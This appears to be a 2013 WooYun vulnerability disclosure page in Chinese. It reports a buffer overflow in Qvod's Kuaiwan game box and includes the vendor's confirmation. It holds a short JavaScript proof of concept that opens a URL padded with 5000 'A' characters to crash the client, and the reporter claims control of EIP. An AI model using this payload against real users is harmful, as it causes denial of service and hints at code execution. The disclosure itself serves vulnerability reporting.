当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025894

漏洞标题:qvod公司的快玩游戏盒对缓冲区边界控制不严重导致拒绝服务,疑似可远程执行

相关厂商:快播

漏洞作者: lmstz

提交时间:2013-06-14 09:01

修复时间:2013-09-12 09:02

公开时间:2013-09-12 09:02

漏洞类型:拒绝服务

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-14: 细节已通知厂商并且等待厂商处理中
2013-06-14: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向第三方安全合作伙伴开放
2013-08-08: 细节向核心白帽子及相关领域专家公开
2013-08-18: 细节向普通白帽子公开
2013-08-28: 细节向实习白帽子公开
2013-09-12: 细节向公众公开

简要描述:

qvod公司的快玩游戏盒对缓冲区边界控制不严重导致拒绝服务,感觉应该可以远程执行代码,只是感觉,因为人家不小心控制了eip (0x41414141),都没有时间玩,望大神继续~
在这里,要感谢一下z8

详细说明:

DoS PoC:

<script>
url="http://chall.3owl.com/";
for (var i=0;i<5000;i++)
{
	url =url + 'A';
}
window.open(url);
</script>


场景还原:
当玩家用快玩打开带有 Poc的页面(临时测试http://chall.3owl.com/kw.html)时,就会触发。
人家还感觉到,如果PoC中加入远程ShellCode就会远程执行代码,因为eip=0x41414141,有没有。

kw.JPG

漏洞证明:

kw.JPG


s.gif

修复方案:

使用安全的函数,检测输入长度

版权声明:转载请注明来源 lmstz@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-06-14 11:19

厂商回复:

已经确认,下个版本将修复此漏洞。
非常感谢lmstz发现此漏洞。

最新状态:

暂无